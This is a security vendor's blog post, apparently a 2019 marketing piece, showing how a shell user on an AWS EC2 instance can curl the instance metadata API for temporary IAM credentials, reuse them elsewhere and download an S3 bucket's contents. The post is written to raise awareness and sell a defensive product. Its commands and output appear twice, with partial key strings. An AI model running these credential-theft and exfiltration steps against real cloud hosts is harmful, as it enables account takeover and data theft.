Are You Only 2 Commands Away From Credential Theft?

By: Mark Jimenez 12.03.2019
Are You Only 2 Commands Away From Credential Theft?

When using AWS, be careful when sharing access to EC2 instances with S3 access.  Any shell user in an EC2 instance with S3 access can list Amazon Resource Names (ARNs) with a single AWS-CLI call:

 

“`

ubuntu@ip-172-31-24-185:~$ sudo snap install aws-cli –classic

aws-cli 1.16.266 from Amazon Web Services (aws✓) installed

ubuntu@ip-172-31-24-185:~$ aws ec2 describe-instances –region us-west-2 | grep arn

                        “Arn”: “arn:aws:iam::860256608252:instance-profile/ec2InstanceProfile”,

“`

 

Once you have the ARN, a curl to the metadata API from the instance will list the session access/secret key and token.

 

“`

ubuntu@ip-172-31-24-185:~$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2InstanceProfile

{

  “Code” : “Success”,

  “LastUpdated” : “2019-11-04T18:32:57Z”,

  “Type” : “AWS-HMAC”,

  “AccessKeyId” : “ASIA4QS2KD76MYWH…”,

  “SecretAccessKey” : “gc9FqDmkRlVi3oYLzOqhgytFAVkm/5XECgZ…”,

  “Token” : “AgoJb3JpZ2luX2VjEDMaCXVzLX…

“`

 

With the keys and token, from any machine on the internet, you can get the same level of access that was in the EC2 instance, including any available access to instances or S3 buckets.

 

Setup

“`

$ export AWS_ACCESS_KEY_ID=<FROM ABOVE>

$ export AWS_SECRET_ACCESS_KEY=<FROM ABOVE>

$ export AWS_SESSION_TOKEN=<FROM ABOVE>

“`

 

Do bad stuff

$ aws ec2 describe-instances –region us-west-1

 

markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls

2019-11-01 16:59:09 markjs3

markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls markjs3

                        PRE secretstuff/

markj@ubuntu:~/disk2/s3test$ mkdir test

markj@ubuntu:~/disk2/s3test$ aws s3 sync s3://markjs3 ./test

download: s3://markjs3/secretstuff/mysecret.txt to test/secretstuff/mysecret.txt

“`

 

The AWS metadata makes shared access to cloud resources easy.  But for enterprises that have not protected themselves from unintended access, it can be easy for any person or any code on that machine to do what’s not intended, which is to exfiltrate cloud credentials for access of those same cloud resources from anywhere.  The moment you share your machine beyond just you, you are potentially opening yourself up to the theft of cloud credentials and precious enterprise data.

 

To avoid this particular threat, Aporeto can control the access to the AWS metadata API based on the identity of the user.

 

Aporeto gives the security architect granular, multi-cloud visualization and control in identifying users and applications and locking down what they can access.  It enables control of user SSH access based on universal identity provider metadata instead of managing SSH keys. For all users and services in the EC2 instance, Aporeto also allows you to monitor and control operating system and network access.

 

The cloud will help you reach everyone, everywhere.  Automated access control from Aporeto allows you to keep doing that, anywhere, dynamically – and most importantly, securely.

 

For more information on how Aporeto can help protect your cloud presence, check our our latest Cloud PAM video. Read our Beyond SSH PAM with Aporeto Solution Brief and our Cloud PAM Product Brief.  And check our our Cloud PAM webpage.  

 

Detail

Given an IAM role with S3 access…

Assume some kind of shell access via any way to break into VM

 

List ARNs

ubuntu@ip-172-31-21-138:~$ aws ec2 describe-instances –region us-west-1 | grep arn

                     “Arn”: “arn:aws:iam::860256608252:instance-profile/ec2InstanceProfile“,

                    

 

Use the ARN to get credentials

ubuntu@ip-172-31-21-138:~$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2InstanceProfile

{

  “Code” : “Success”,

  “LastUpdated” : “2019-11-02T00:21:33Z”,

  “Type” : “AWS-HMAC”,

  “AccessKeyId” : “ASIA4QS2KD76…”,

  “SecretAccessKey” : “3CSUusT4CT+jB3Jtn3pGyH…”,

  “Token” : “IQoJb3JpZ2luX2VjEPH//////////wEaCXVzLXdlc3QtMSJHMEUCIQCdeGRUZmfkS…”,

  “Expiration” : “2019-11-02T06:56:39Z”

}

 

Then somewhere else and steal data or whatever else the Role allows

Setup

$ export AWS_ACCESS_KEY_ID=<FROM ABOVE>

$ export AWS_SECRET_ACCESS_KEY=<FROM ABOVE>

$ export AWS_SESSION_TOKEN=<FROM ABOVE>

 

Do bad stuff

$ aws ec2 describe-instances –region us-west-1

 

markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls

2019-11-01 16:59:09 markjs3

markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls markjs3

                        PRE secretstuff/

markj@ubuntu:~/disk2/s3test$ mkdir test

markj@ubuntu:~/disk2/s3test$ aws s3 sync s3://markjs3 ./test

download: s3://markjs3/secretstuff/mysecret.txt to test/secretstuff/mysecret.txt

 

Recent Posts 4 Things to Check Out While You’re in Las Vegas for AWS re:Invent 2019 Palo Alto Networks Announces Intent to Acquire Aporeto Three AWS re:Invent Sessions You Shouldn’t Miss